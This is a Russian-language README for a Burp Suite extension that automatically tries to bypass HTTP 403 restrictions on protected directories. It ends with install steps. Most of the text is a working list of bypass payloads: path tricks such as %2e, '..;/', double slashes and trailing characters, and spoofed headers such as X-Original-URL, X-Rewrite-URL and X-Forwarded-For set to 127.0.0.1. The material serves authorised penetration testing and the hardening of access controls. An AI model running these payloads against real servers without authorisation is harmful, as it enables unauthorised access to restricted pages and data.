
Расширение Burpsuite для обхода ограниченного каталога 403
Расширение для BurpSuite для обхода 403 ограниченных директорий. Используя PassiveScan (включен по умолчанию), каждый 403 запрос будет автоматически сканирован этим расширением, так что просто добавьте в BurpSuite и наслаждайтесь.
Полезные нагрузки: $1: ИМЯ_ХОСТА $2: ПУТЬ
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/
Спасибо @lohubi за добавление множества полезных нагрузок.
BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish